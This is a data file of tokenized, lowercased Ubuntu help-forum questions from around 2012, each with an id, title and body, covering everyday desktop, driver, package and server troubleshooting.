147778	problem with compiz saving key bindings	i use blender on ubuntu , and need to free a shortcut . the key combination is ctrl+alt+numpad0 . in ccsm this shortcut is listed under general settings > keybindings . but when i edit this setting , nothing changes . and when i restart ccsm they old key combination is back . any ideas how to fix this ?
147779	ubuntu 12.04 installed , monitor turns off after bios screen	after a little struggling , i managed to install ubuntu 12.04 lts i can hear the comp running while the screen is off , it turns off directly after the bios screen . i 'm very much a newbie to this so any help is great . specs : thermaltake v4 mid tower case with 500w psu - usb 3.0 - transparent window - 10x 5.25 '' & 3.5 '' drive bays - front speaker & hd audio inputs a-ram 4gb memory , pc3-10600 ( 1333mhz ) ddr3 , 240-pin dimm , non-ecc , cl 9-9-9-24 amd a6-3500 triple core fusion apu - socket fm1 - 2.1ghz - 3mb l2 cache - integrated radeon hd6530d graphics - tdp 65w - llano - fan included asrock a75m-hvs motherboard - amd socket fm1 - amd a75 fch chipset - 2x ddr3-2400 - 1x pcie x16 , 1x pcie x1 & 1x pci - 6x sata3 - 4x usb3.0 - d-sub & hdmi - 5.1 channel audio - gigabit lan - micro atx crucial m4 64gb sata 6gb/s solid state drive - 2.5 '' - 500mb/s read & 95mb/s write - nand management ( details on the partitioning of this drive below . western digital wd caviar blue 3.5 '' 1tb sata 6.0gb/s 7200rpm 32mb hard drive hp le2001wm 20 '' widescreen lcd monitor - 1600 x 900 resolution - 250 cd/m2 - 1000:1 contrast ratio - 5 ms response time - dvi-d & vga - speakers when installing ubuntu , i used the 64 gb ssd for the following : i partitioned a 500mb /boot drive , which i asked the boot loader to run from . there was a / partition ( approx 10gb ) , a partition of 2gb for the swap a /home partition with the remainder of the space on the disc . i used a couple of google searches to find guides to the above partition choices . i 'm happy to be told to do it differently , i only want to use the os for multitasking and browsing the web at the moment .
147784	ltsp : flash plugin crashes after updates	i am running an alternate install 64 bit ubuntu 12.04 with ltsp-server-standalone . i recently ran a few updates , including adding wine from the repos , adding medibuntu , and adding google earth , all on the server , which runs as a user workstation . before the updates , the flash plugin ran fine in thin clients . however , it now crashes . no problem with running the flash plugin on the server / workstation . i have since followed the ltspmanual pdf to copy over my sources list , add medibuntu in the chroot , update and upgrade , and then update the image , but the flash plugin still crashes . i 'd like to get the flash plugin working again in my thin clients . how do i do this ? suggestions appreciated ! more information in this thread : http : //ubuntuforums.org/forumdisplay.php ? f=336 thanks ! edit can someone help me out here ? i just do n't understand why flash worked yesterday in my thin clients and does not work today . the flash plugin hash not changed since the 4th june . on my machine though i notice that firefox was updated from v 12 [ running on the 6th ] to v 13 [ running on the 7th with broken flash in the thin client ] . here is an except from the log : start-date : 2012-06-04 16:36:51 firefox : amd64 ( 11.0+build1-0ubuntu4 , 12.0+build1-0ubuntu0.12.04.1 ) start-date : 2012-06-07 07:30:19 firefox : amd64 ( 12.0+build1-0ubuntu0.12.04.1 , 13.0+build1-0ubuntu0.12.04.1 ) i really do not undertand and am getting very frustrated . last thing i want to do is fiddle with flash - lost enough time in previous distros with that ! should i go back from firefox v 13 to firefox v 12 ? how would i go about doing that safely ?
147792	force xscreensaver to go fullscreen on ubuntu 12.04	i 'm using xscreensaver on ubuntu 12.04 instead of gnome-screensaver . when xscreensaver activates , the unity top- and sidepanel are still visible . does anyone know how to force those to the background ? any help would be very much appreciated . thanks in advance !
147794	gnome tweak tool not installing	i tried to install gnome-tweak tool but its says the following packages have unmet dependencies : gnome-tweak-tool : depends : python ( < 2.8 ) but 2.7.3-0ubuntu2 is to be installed what should i do to install gnome-tweak tool ?
147795	ubuntu stopped working after uninstalling kubuntu	after installing ubuntu on my laptop , i installed kubuntu to see what it is like . i preferred ubuntu , so i uninstalled kubuntu using these instructions https : //help.ubuntu.com/community/puregnome . during the uninstallation terminal said that i need to stop a kde deamon and i clicked yes and it closed my desktop and put me in tty1 ( i think ) . since i did n't know what was happening and nothing seemed to be changing , i force shut down the laptop . now when i start it it is forever on the loading screen . i 've tried to reinstall using a disc , but that wo n't load either . i am new to linux/ubuntu and have no idea how to do things .
147797	privoxy stripping css from yahoo mail	i 'm currently trying to get privoxy working as a general filtering solution and the majority of its working fine , however there 's an issue where with yahoo mail it 's stripping all the css . i 've attempted a few things such as { allow-ads } and setting it as fragile , but neither have fixed it , am i missing anything specific ?
147799	after i install program with wine , i ca n't launch it due to missing dll 's . how do i add them ?	i ca n't install any program with wine on ubuntu 12.04 . for example i ca n't install zune ( windowsphone sync ) on ubuntu 12.04. when installing ( zune program ) i take this error : '' wine program crash internal errors - invalid parameters received `` please help me . basamraz @ live.com tanks .
147800	ripping dvd to iso - accurately	i have been using brasero to rip my dvd collection to .iso . however , i 've discovered some errors in some of the dvds through playback e.g . vlc player would just stop playing the iso file when a bad section in playback is met ( half-way through a film ) . the worst thing is that no errors or warnings were thrown during the ripping process - i could have . is there a method or application that will monitor dvd/file data integrity and avoid such scenarios in the future ? anything equivalent to exact audio copier or cdparanoia for dvds ?
147805	nautilus folders turned chinese	i am running ubuntu 12.04 lts with gnome shell 3.4 . i 've been having problems with language settings being changed to chinese ( i.imgur.com/gr2rn.png ) . i have fixed the problem of menus and everything else being in chinese to be modified back to us english by changing the language at the login prompt , and have tried to remedy the problem by editing /etc/default/locale , but am at a loss of how to change the folders from chinese back to us english . for example , when i browse through nautilus some of my folders are in chinese . any ideas ?
147807	how to install apps on virtualized ubuntu system ?	this question might seem to be basic and rudimentary , but i just have to ask because i 'm not getting it . i downloaded xampp and eclipse to my system and after starting ubuntu through vmware i ca n't find the applications in my directory . is this normal ? how can i find and install the applications or any other software ?
147808	is there any encoder for ubuntu like windows media encoder	i`m looking for something like windows media encoder . which i use for broadcasting . the reason is that windows media encoder series is for windows and no support ubuntu os . i want to boradcast the addressing of one person live . please help ...
147809	is shell script enough for standalone application on linux	can someone please tell me if writting shell scripts is enough for making a standalone application for linux based pc 's ? i 'm only proficient in php/mysql on windows . thanks for you time and patience
147812	shell scripting for linux server administration	i recently started learning linux ( ubuntu ) , and i 'm aware that linux has it 's own form of language i.e shell scripting . what i 'll like to know is that is this language enough to administer a linux server ? i can also code in php/mysql and i 'll also like to do some standalone app for linux based pc ( not with php/mysql ) , will shell scripting be enough for me to achieve these. ? thank you for your time , patience and answer . i most appreciate it .
147814	ubuntu 12.04 64-bit crashes	i 've installed precise pangolin 64-bit on acer 7250 , 6gib ddr3 , amd radeon hd 6310 , and it always crashes . when i start on the system , it run until the launching of the x-server , and the computer freezes , but if i connect the network interface with another pc it works without any problem . i have windows 7 on the same pc and i do n't have any problem there . help me to solve this problem please .
147816	why after a time of inactivity three cores of cpu go off ?	i run ubuntu 11.10 on a dell inspiron n4050 which has an intel core i3 cpu . after a time of inactivity sometimes few seconds , sometimes 2 or three miutes or even more cpu2 3 and 4 spike then go to zero and only cpu1 still works . when activity is resumed by moving the cursor for example all cpus are put on . i would like to post an image but since i 'm new i could n't . i do n't know if putting off the three last cores of the cpu is an option to reduce power consumption or something like that..
147829	i cancelled gparted operation , what to do next ?	i cancelled gparted operation by mistake .now one of the partition became corrupted , what to next ? should i format it ? data is important to me ; ( edit1 : i tried to recover partition using testdisk and successfully recoverd losted partition , but another partition ( an extended partition containing ubuntus ) gone , how to recover it ? : ) edit2 : testdisk saved my life , it recovered all my partition without losing data ,
147835	how to safely uninstall ubuntu 12.04 and reinstall 11.10	i upgraded from 11.10 to 12.04 following the instructions here . https : //help.ubuntu.com/community/preciseupgrades . but after the upgrade a lot of my image processing packages do n't work some of their dependencies have been removed . honestly there is not that much difference between 11.10 and 12.04 . so please can someone tell me how to safely remove 12.04 and go back to 11.10 without losing documents , and source packages on my old ubuntu . thanks
147842	how to install python-igraph ?	i am following these instructions to install python-igraph . adding ppa words and update works . but the install complains of the following : could n't find any package whose name or description matched `` python-igraph ''
147847	changing mouse behaviour in eog	when i open a photo in eog i can easily zoom with the mouse mouse wheel . this is kind of nice but since i have a touchpad with two-fingered scrolling and horizontal scrolling i 'd rather scroll in the image and zoom by using ctrl+mouse wheel ? i basically want the same behaviour as in evince : horizontal scroll and normal scroll navigate within the image and ctrl + mouse wheel zooms in and out . is this possible somehow ? [ edit ] i just figured out that what i want is already implemented : i can pan the image by using ctrl + mouse wheel . this is fine as it is the behaviour i want only with the ctrl inverted . but i can not pan to the left . up , down and right work fine . what 's the problem ?
147850	how to install a tar.gz file on ubuntu 12.04	i am trying to install a web browser that is a tar.gz file and i go to extract it all that happens is it gets turned into a file system i am fairly new to ubuntu and linux so you might have to walk me through some steps thanks in advance
147855	apache server ssl problems	hi there is this weird problem going on with putting ssl on the server i keep on getting this error in the terminal after i already created the .key and .crt files but it keeps on saying i placed the files in the conf.d directory and i already configured the thing so there is something that i did wrong there i also used openssl to create a .key and the .crt files thanks for the help if anyone can service apache2 reload syntax error on line 1 of /etc/apache2/conf.d/www.domainname.crt invalid command ' -- -- -begin ' , perhaps misspelled or defined by a module not included in the server configuration action 'conftest ' failed . the apache error log may have more information . ... fail !
147856	why ca n't i change the permissions of files i have access to ?	i 'm logged into a server as user `` ubuntu '' and i 've got files that look like this : -rw-rw-r -- 1 www-data www-data 33150 2012-06-04 22:17 file-a.png -rw-rw-r -- 1 www-data www-data 36371 2012-06-04 22:15 file-b.png -rw-rw-r -- 1 www-data www-data 41439 2012-06-04 22:16 file-c.png the ubuntu user is a member of the group www-data : groups ubuntu produces ubuntu : ubuntu www-data so should n't i be able to change other permissions since i have access to the file ? i 'm not an expert on the user/group stuff . so this is just perplexing me . i 'm trying to run : chmod o-r * i realize i can do it with sudo , easily , but i 'm trying to understand why i ca n't modify the files without sudo .
147857	how to make evolution mail work with my work email address ?	this is the 1st time to write here and the 1st time to use a mail client other than outlook . i tried to add my enterprise email address to evolution mail , i tried both server types exchange mapi and microsoft exchange . with exchange mapi i get this error message `` authentication failed . mapilogonprovider : failed to login into the server '' with microsoft exchange i get this error `` could not connect to server . make sure the url is correct and try again . '' although i 'm sure of all the steps server : ip address of the mail server username : domainname\username domain : domain name my system is ubuntu release 11.04 ( natty ) kernel linux 2.6.38-15-generic genome 2.32.1 evolution 2.32.2 any kind of help is appreciated and thanks in advance
147858	how to remove desktop environments ?	i installed few environments that i wanted to try out on ubuntu 12.04 , but none of them worked at all . it could be that i installed them all at the same time , meaning the os did n't get a chance to work everything out , but either way , they did n't work . i would now like to remove them . the one 's that i installed are xubuntu/xfce , lubuntu/lxde , kubuntu/kde , fluxbox , openbox , cinnamon , and mate . i installed them through the help of this site . everything seemed to have been working properly until i actually tried to use the shells and nothing loaded at all . except for fluxbox , i think that one worked . i want to know of any way to repair or perhaps just remove the packages entirely . i might have already removed them because i did the apt-get remove command on all of them , but they were still in the list on the login screen .
147859	what is the reason for high power consumption on my thinkpad t420s	i have n't seen this exact question posted or any related answers , so i 'm re-posting . here is the problem : after upgrading to ubuntu 12.04 precise pangolin , my t420s laptop idles above 20 watts ( right now with only chrome running , i 'm using 25.4 w ) i had a similar problem with ubuntu 11.10 , but after much tweaking the power consumption came down < 10 w on idle . the primary culprit to the 11.10 problem was supposedly fixed by default in 12.04 . so my question is , what is happening now ? computer : lenovo thinkpad t420s , with intel i5-2520m @ 2.5 ghz - 2x 4gb ram - disk 0 hitachi 320 gb - disk 1 sata ssd 128 gb here is the print out from powertop power est . usage events/s category description 5.15 w 3521 rpm device laptop fan 1.75 w 100.0 % device display backlight 1.75 w 100.0 % device display backlight 263 mw 0.0 pkts/s device network interface : wlan0 236 mw 100.0 % device radio device : rtl8192ce 235 mw 0.0 pkts/s device network interface : eth0 ( 0 mw 15.8 ms/s 0.0 process powertop 0 mw 3.0 ms/s 0.0 process gnome-terminal 0 mw 2.9 ms/s 0.0 process /usr/bin/ibus-daemon -- xi 0 mw 1.5 ms/s 0.0 process /usr/bin/x :0 -auth /var/ 0 mw 1.2 ms/s 0.0 process python /usr/bin/jupiter 0 mw 680.4 µs/s 0.0 timer tick_sched_timer 0 mw 579.0 µs/s 0.0 process /usr/bin/python /usr/shar 0 mw 412.2 µs/s 0.0 process syndaemon -i 2.0 -k -r -t which , including both ( ? ) display blacklights accounts for only ~10w of the 17 w discharge rate reported . thoughts ?
147863	how to upgrade to firefox 12 not 13 on ubuntu	yesterday my firefox was upgraded from 12 to 13 and i downgraded it back following this , specifically 12.0+build1-0ubunut0.11.04.1 not 4.0+nobinonly-0ubuntu3 ( natty ) . besides the new version 13 , there was only one other selection , my previous version 12 . today , firefox got upgraded again and so i followed the same steps but instead of version 12 ( there was only one other version besides 13 again ) , it must have been version 4 because my firefox is now version 4 and there is n't the version 12 selection . how do i get back to the version 12 i had ? i do n't want 13 ( some things break on it ) and definitely do n't want version 4 . thanks !
147867	ca n't put .desktop into /usr/share/applications	i have been following this post : add teamspeak3 to unity launcher ? i have created my .desktop file and it works create , now all the guides have been telling me to put this file in the /usr/share/applications folder but when i drag it there , i get this error : there was an error moving the file into /usr/share/applications . error move file : permission denied i 'm guessing the folder doesnât have the correct permissions but none of the guides have mentioned this . i 'm wary changing permissions as i just had to reinstall my whole system after doing something similar which messed up my whole system when trying to install new apps .
147872	unable to install apache in ubuntu 12.04	i am in desperate need to install apache on my ubuntu 12.04 . i searched on the web and tried to follow the instructions given in : https : //help.ubuntu.com/10.04/serverguide/httpd.html log from my terminal pasted here for your reference : jacob @ jacob-laptop : ~ $ sudo apt-get install apache2 [ sudo ] password for jacob : reading package lists ... done building dependency tree reading state information ... done apache2 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up crossplatformui ( 1.0.27 ) ... rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service acpid restart since the script you are attempting to invoke has been converted to an upstart job , you may also use the stop ( 8 ) and then start ( 8 ) utilities , e.g . stop acpid ; start acpid . the restart ( 8 ) utility is also available . acpid stop/waiting acpid start/running , process 8643 package libqtgui4 exist qt_version = 4 make -c /lib/modules/3.2.0-25-generic/build m=/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-25-generic' cc [ m ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:34:28 : fatal error : linux/smp_lock.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o ] error 1 make [ 1 ] : *** [ _module_/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-25-generic' make : *** [ modules ] error 2 dpkg : error processing crossplatformui ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : crossplatformui e : sub-process /usr/bin/dpkg returned an error code ( 1 )
147874	connection to host xxx.xxx.xxx.xx was closed ubuntu 11.10 to mac	i am trying to do a remote desktop connection to a mac using the remote desktop viewer in ubuntu 11.10 with the vcn protocol . i get to the password prompt enter my password then i get the error that the connection was closed . i can ssh to the mac and navigate via the command line with no problem , but i really need to access the desktop . i would appreciate any suggestions as i am at a loss . thanks in advance .
147877	laptop locks screen instead of hibernates	i am having hard time trying to hibernate kubuntu 12.04 it does n't hibernate . instead it goes to the lock screen only . i checked the swap and it 's 10g and active . i tried to hibernate using the command `` sudo pm-hibernate '' and it worked . but , i want a better fix without using commands . thanks a lot in advance : )
147880	script zenity + inotify	i would like to have a simple script to notify the user in the screen , each time a new folder or file is created in a shared folder . the output should be like `` you have a new file/folder named newfile/newfolder '' . i 'm using this script , but i 'm not able to put the newfile/newfolder name in zenity output . while inotifywait -r -e create ~/documents/process do zenity -- warning -- ? ? ? ? done thks djames
147884	gnome shell menus behind the panel	in gnome shell when i right click to open the content menu for firefox and some other applications , some of the objects are behind the top panel and i have to scroll down and click again to see the top objects . is this a bug or by design ? thanks .
147887	ca n't install guitar pro 6 on 64-bit ubuntu on laptop , but i could on desktop	i have ubuntu 12.04 lts 64-bit on both my laptop and my desktop . i managed to install guitar pro 6 on my desktop by using 32-bit dependencies , following the instructions here to install : i followed the exact same methods on my laptop , but guitar pro 6 wo n't run . i have tried the official demo from the website , which did n't work either . when downgrading my libraries to 32-bit for guitar pro 6 install , at some point in the terminal it had an issue with libgl , saying it was installed by the video driver . i suspect this may be the cause of the problem , since after googling for hours , the only issues were with libportaudio , which i downgraded successfully . so , is there a way to downgrade libgl to 32-bit , since it is installed with the video driver ? would this stop my display working , or is it impossible ? -- i also tried installing the windows version under wine and playonlinux , neither of which worked . guitar pro 6 installs successfully , but then nothing happens when i try to run it . if i am wrong about libgl , does anyone know a way i could get guitar pro 6 working ? i desperately need it to work , and do n't want to downgrade to 32-bit . update : i ran /opt/guitarpro6 ! $ ldd ./guitarpro and it reported that libgl.so.1 was 'not found' i found the file ( s ) in the nvidia-current directory , and placed them in /usr/lib/i386-linux-gnu/mesa/ the issue now is , how can i tell guitar pro 6 where to find them ?
147889	set up java path for terminal	trying to set up a path for the terminal . i already have eclipse running great . dual os between windows 7 and ubuntu 12.04 . however , i would prefer to run everything out of ubuntu , just not very experienced and all the forums i have searched are not giving me the step by step answers i need to make this happen . i included a screen shot of some information about my version etc . any help would be greatly appreciated at this point i 've put 10+ hours into this and this is my last resort .
147895	how to install dbx ?	i use dbx on an aix server and i would like to use it on my ubuntu 12.04 too . how do i get it ?
147898	help locating the virtualbox export ?	i just did this vboxmanage export foo_to_be_export -- output bar.ova but then i forgot to setup the default path . however , it shows it 's 100 % . i could n't find this image now . i tried sudo find / -name bar.ova sudo find . -name bar.ova and none finds anything . the first one seems to take forever ( 8 mins already ... ) so i just stopped it . does anyone know the default path ? how can i find out ?
147899	how to make show desktop work only on the current workspace ?	i am an active user of workspaces in ubuntu . until recently , pressing ctrl+alt+d ( show desktop ) acted only on the current workspace . for example , one might want to minimize the applications in the current workspace , open a file , and then bring some of them back . the current implementation works on all workspaces uniformly which is counter-intuitive to me . the reason for the existence of workspaces is the separation of logic -- one can have a browser open in one workspace , a text editor in another , a terminal in a third . the current functionality goes against this idea . is there a way to restrict the action of the show desktop command to a single workspace only ?
147910	backup , install and restore programms/settings of ubuntu ( wubi ) installation	i would like to now how to backup my ubuntu ( wubi ) instllation correctly . i would like to install ubuntu on my harddisk and replace my programms/files/settings from my previous wubi installation . is that somehow possible ? thanks stefan
147913	how to keep windows from snapping back from neighbouring workspace ?	when i move an unmaximized open window out of the way ( e.g . for copying between two apps ) , and it 's partially ( e.g . 1/2 or 3/4th of its surface ) into the neighbouring workspace , it immediately snaps back so that the entire window remains inside the current workspace . this is happening ever since i moved from ubuntu 3d desktop environment with unity ( when everything was fine ) to gnome classic with gnome-panels and disabled the unity plugin ( i have 12.04 64-bit ) . i tried lots of different compiz settings in ccsm , but i ca n't seem to find the right one . i would like the windows to stay where i put them , even if that means they are 80 % in a neighbouring workspace . thanks
147915	ca n't install limbo update 1.2-1	yesterday an update was released for the humble indie bundle game limbo . i have previously installed limbo through the software center . but when i try installing the new version i get the following : ( reading database ... 100 % ( reading database ... 189895 files and directories currently installed . ) unpacking ia32-limbo ( from ... /ia32-limbo_1.2-1_amd64.deb ) ... dpkg : error processing /home/carroarmato0/applications/games/humble bundle/ia32-limbo_1.2-1_amd64.deb ( -- install ) : trying to overwrite '/opt/limbo/lib/python/distversion.py ' , which is also in package limbo-bin : i386 1.0-0ubuntu4 dpkg-deb ( subprocess ) : data : internal gzip write error : broken pipe dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg-deb ( subprocess ) : failed in write on buffer copy for failed to write to pipe in copy : broken pipe
147917	what 's the latest version of chromium and how can i upgrade my current version to it ?	launchpad seems to say 18 but wikipedia says chromium 21.0 was released on 11 may 2012 . i 'm currently using version 18 on a 64 bit 11.04 install .
147918	power management issues on an asus n55	i noticed that with respect to win7 on my asus n55 ubuntu 12.04 tend to overheat the system . after startup the fan controller takes control of the fan , i could here it slowing down , after a few second following a login the fan increases its speed again . though there are no processor hungry process : top shows only xorg consuming 4 % . even with the system monitor the cpus load look ok. is it a power management related problem ? this can cause battery life troubles in general , and electronics is never happy to be overheated . is there a better tool to root the cause of the issue ?
147920	problem with ubuntu installation , removed windows by accident and ca n't boot into anything	i think i have deleted my windows os while installing ubuntu , i meant to do a dual install but while doing this i messed up my partition wiping my whole hard drive clean . i was not able to boot any os it just came up with a error . i was able to use the ubuntu live cd to get onto my hardrive there was nothing there my laptop would n't allow me to install ubuntu ether but after i was able to partition my drive so i could install ubuntu but still it will not allow me to install windows . i do n't know much but i think i have to re-partition my drive so it will allow me to install windows again . i have another feeling its because i do n't have the service packs needed to install windows 7 but ubuntu will not allow me to install these ether . ps . while installing ubuntu i clicked the make space option while installing a link to a video showing what i mean - http : //www.youtube.com/watch ? v=uuyx1la1ngs & feature=plcp
147923	space escape character in debian makefiles	i 'm currently trying to upload a package onto launchpad 's ppa service but i 'm having problems with a path name which includes a space character . i 'm trying to make a file install into a directory with a space character in it . the following is an example of the kind of directory i 'm trying to install files into using the makefile : ( /usr/share/themes/example directory/gtk-3.0 ) i 've tried the \\ escape character and have tried putting the entire path name in single quotes ( '/usr/share/themes/example directory/gtk-3.0 ' ) in the makefile and debian/install file in the source of the package , but it 's still failing to build on launchpad 's servers . does anyone know any escape character that i can use in order to make launchpad successfully build the package and make it work when i 'm installing the package to my computer or are spaces in directories not supported by the debian package system ? thanks in advance !
147925	screen resolution stuck under 1366x768	i want my old machine ( athlon xp , radeon9200 , ubuntu 11 on a 19 '' mitsubishi diamondtron ) to display a screen resolution of at least 1600x1200 @ 75hz . the monitor 's control panel gives no option and xrandr / flgrx commands does nothing . anyone who knows a working command line wins one free internet , otherwise i 'll just roll back to xp pro . yes i know ati has no drivers ... but it 's a good machine , trust me .
147926	how to really password protect my laptop ?	this has really come to my mind lately . i was checking the gnome keyring and then found out that by simply right clicking the login part , one can see every password i have for authentication on facebook , google , etc . is there a way i can encrypt/password protect this ? let 's say , in an event someone actually finds my laptop open and decides they should enter my social networks ?
147930	is there any 'search software center ' lens ?	in 12.04 i have noted that there is a lens for almost everything , so i was wondering if there is any such lens to search usc and getdeb , i also wanted to know if there is a lens to search custom website
147931	malibal lotus p150em-se ( clevo p150em / sager np9150 ) keyboard does n't light up after suspend	hi i have a malibal lotus p150em-se running ubuntu 12.04 the backlit keyboard is no longer lit after i suspend . any ideas on keeping it lit after suspend and also if it would be possible to get the other colors my keyboard is capable of working .
147932	updates cause ubuntu to crash/ `` soft lock ''	right after installation i get updates so everything is up to date . everytime i do this however , after updating , ubuntu will not start up . ive narrowed it down to these updates that are causing my system to crash : complete generic linux kernel , header files related to linux kernel version 3.2.0 , linux kernel headers for version 3.2.0 on 64 bit x86 smp , generic linux kernel headers , linux kernel image for version 3.2.0 on 64 bit x86 smp , generic linux kernel image , linux kernel headers for development . what are these updates for and are they absolutely necessary ? or can i do without them ? ive had to reinstall ubuntu 7 times trying to figure this out and it is really irritating as you would guess .
147933	ignore partial upgrade -- google earth dependencies	i 'm running a 64-bit install of xubuntu 12.04 . it took me a little while to get google earth working . the 64-bit google earth package requires some 32-bit gtk libraries provided by ia32-libs . however , when i ran a simulation to install ia32-libs and it 's dependencies , it wanted to remove a ton of programs , including the xubuntu-desktop meta-package . as a work-around , i used getlibs to get the 32-bit libraries i needed , and then installed google earth with the deb package and the -- ignore-depend option to dpkg . awesome , google earth is installed and is working great ! now , however , update manager keeps complaining about a `` partial upgrade '' , and apt-get wo n't let me install any new applications . it wants me to do a fix-broken install , but when i do a simulation of apt-get -f install i get some very bad news , they want to uninstall the google earth i just worked so hard to install ! $ > apt-get -f -s install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : googleearth 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . remv googleearth [ 6.0.3.2197+0.7.0-1 ] tl ; dr the -- ignore-depends passed to dpkg is not propagating to apt-get , so now i ca n't install any new applications until i uninstall google earth , because of it 's missing dependencies ( even though it works fine without them ) . how can i fix this ?
147934	view users connected to ad-hoc network	i created an ad-hoc network to share my hard-wired connection with other computers/devices , but i ca n't find anywhere a place that shows the connections . can i ? where is it ? assuming it exists , what information is available about the connected devices ? are there multiple locations to get information about them ?
147936	does creating a socks proxy via ssh hide my activities from my isp ?	i 've been using an ssh tunnel for browsing , reading that doing so would encrypt the connection to the internet . however , i have no idea as to what kind of protection that the ssh tunnel really provide . does it just protect my connection from network/packet sniffers or does it block out my isp as well ? edit : also , must i use a remote server to ssh to or can i just tunnel to localhost and still have the same effects ? e.g the command i use now is ssh localhost -p 22 -nd 8080
147937	default login screen gone , how to revert ?	i just installed 12.04 and was playing around , i dont remember what i did , now after one logout beautiful default login screen has changed into gray area , help needed
147940	why do lp and lpr return unauthorized error ?	so my questions are : what would cause lp or lpr to return unauthorized ? what can i do to fix this problem ? i 'm running ubuntu 10.04 lts with latest updates . this worked and then stopped after an update . the problem is i do n't remember when it stopped . my user is part of lpadmin , which allows me to create and configure printers through the cups interface . here are my system 's protections for lp and lpr . root @ steamboy : /usr/bin # ls -l lp -rwxr-xr-x 1 root root 13540 2011-09-12 10:41 lp root @ steamboy : /usr/bin # ls -l lpr -rwxr-xr-x 1 root root 13540 2011-09-12 10:41 lpr only if i sudo can i print something at the command line using lp or lpr . ics @ steamboy : ~/icsdev $ lp x.tmp lp : unauthorized ics @ steamboy : ~/icsdev $ lpr x.tmp lpr : unauthorized ( x.tmp is a real file . )
147942	how do i install third-party rhythmbox plugins ?	now that the dust has settled and rhythmbox has become ( again ) the default music-media player in 12.04 & 12.10 , i 'm interested in extending its functionality . for example , the default lyric plugin does not work for me and there does n't appear to be an sound-equalizer by default . having done a search , i came across the gnome-website that lists a number of third-party plugins , some-of which i wish to install which can resolve the above . however , there does n't appear to be .deb packages or a repository containing these plugins . instead there are links to source-code websites such as github and others . so , i 'm confused - i do n't know which plugins works in 12.04 or 12.10 versions of rhythmbox ( v2.96 & v2.97 ) and i 'm not sure how to install these .
147944	bulk/batch convert mp3 files to ogg via command line ?	is it possible to convert mp3 to ogg via command line ? i 'd like to just in a bulk swoop convert my mp3 files to ogg so i can play them in firefox without any issues .
147947	startup disc creator not allowing any iso to be loaded	i have 12.04 , ubuntu , and startup diskcreator is n't allowing the program to see the iso . root perms it just does n't load it . the usb loads fine though .
147948	can we add back track tools to 12.04 ?	if possible , then how can i add the tools available under back track linux to my ubuntu 12.04 distribution . i prefer their functionality from the terminal .
147953	why is samba access from windows so slow ?	i have set up a file server using ubuntu 12.04 server . the purpose is to serve several network drives to windows users that have heretofore been served by numerous nas drives . i have samba set up with one share defined so far . i can connect to it fine from my test windows 7 and windows xp machines . when i do a directory listing on the share from windows , it can take up to two minutes to get all the files listed -- would have taken about 1.5 seconds when i was using the buffalo nas . sometimes it times out with no response at all . i have used the default smb.conf and simply added the following for the share i have set up so far : [ engineering ] comment = ubuntu file server share path = /networkdriveshares/engineering browsable = yes guest ok = yes read only = no create mask = 0755 i have tried changing the workgroup setting to the active domain name our windows computer use but did n't notice any difference . the only other change i made to the default smb.conf was adding in the recommended socket settings : so_rcvbuf=8192 so_sndbuf=8192 socket options = tcp_nodelay lots of information about slow samba shares online but i have tried all of the solutions i have found and none have made a lick of difference . if there is no solution , is there a better way to set up a file server to be used by windows clients ?
147954	how can i get lp and lpr to run as if i were root ?	this post is related to why do lp and lpr return unauthorized error ? however , i am asking this question to find a workaround to my problem . i can use lp and lpr using sudo . i 'd like to know how i can change permissions , so applications can run lp and lpr as if they were root . for that matter , i 'd like to be able to do the same thing . i 've entered a bug on launchpad to cover this , but have not heard back . thanks .
147956	why is the root partition on my disk full ?	i installed ubuntu 12.04 by doing a fresh install where there was previously ubuntu 11.10 . my computer warns me now that my disk is nearly full . after having run apt-get purge , run apt-get autoremove and emptied the trash can , i still have this problem as shown by this screenshot of gparted : the disk /dev/sda7 is indeed full . i ran the disk usage analyzer ( baobab ) and i am still not sure of what is happening : one of my hypothesis is that when installing ubuntu 12.04 , i did n't configure my disks well and the disk /dev/sda6 is not mounted well as /home . is this the reason indeed ? what should i do to verify this and then to get the things fixed ? here are a few additional details to answer the questions i received ( thank you everybody ) : my home directory is not encrypted . the backup utility ( déjà dup ) is not set for automatic backups . ( i do it myself and manually . ) after i mount /dev/sda6 , the command df -h gives filesystem size used avail use % mounted on /dev/sda7 244g 221g 12g 96 % / udev 3,9g 4,0k 3,9g 1 % /dev tmpfs 1,6g 904k 1,6g 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 3,9g 164k 3,9g 1 % /run/shm /dev/sda6 653g 189g 433g 31 % /media/8ec2fa69-039b-4c52-ab1b-034d785132a1 ( sorry but formatting this into code does not work , for an unknown reason ) thanks to izx 's post , i realized /dev/sda6 was not even mounted before . it contains all the documents i used to have when i was running ubuntu 11.10 .
147959	ubuntu 12.04 problem connecting internet by mobile broadband through lg gu220	i am using ubuntu 12.04 . i use my lg cellphone titled gu220 using aircel connection . the phone gets connected as an usb device well enough , but the network always fails to connect whenever i try to connect through mobile broadband . i also have windows 7 which does not fail to connect the network through pc suite . i tried it several times even after restarting both phone and ubuntu but in vain . also for 1st two days things worked well and the network was well connected ; the problem started just after those two days - in from the next login .
147963	desktop installation fails on dell precision t1600 with nvidia quadro card ?	i 'm trying to install ubuntu 12.04 desktop on a dell precision t1600 , however , i get a blank screen with only a blinking cursor in the top left hand corner ( this is after the grey screen with the small ubuntu logo at the bottom ) . if i remove the nvidia quadro 2000 card and plug a monitor into the built-in vga port , then the installation works fine . also , i 've tried an nvidia quadro 2000d by pny , but i get the same problem . has anyone installed ubuntu 12.04 desktop on a dell precision workstation ?
